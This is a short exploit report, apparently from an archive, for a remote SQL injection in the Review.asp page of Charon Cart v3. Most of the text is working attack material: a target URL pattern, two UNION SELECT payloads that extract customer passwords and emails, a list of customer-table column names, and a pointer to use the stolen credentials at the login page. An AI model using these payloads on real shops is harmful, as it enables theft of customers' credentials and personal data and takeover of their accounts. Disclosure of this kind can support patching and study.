Charon Cart v3 suffers from a SQL injection vulnerability in Review.asp.
4ac05cfc744d1e027e1ed13515201d2bVulnerability Report
*******************************************************************************
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.charon.co.uk
# Exploit;
*******************************************************************************
###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]
Example:
//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge]
Columns;
"""""""""""""""""""""
CustomerID
"""""""""""""""""""""
CustomerEmail
"""""""""""""""""""""
CustomerPassword
"""""""""""""""""""""
ShipCountry
"""""""""""""""""""""
Phone
"""""""""""""""""""""
.........
"""""""""""""""""""""
....
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
Comments
No comments yet, be the first!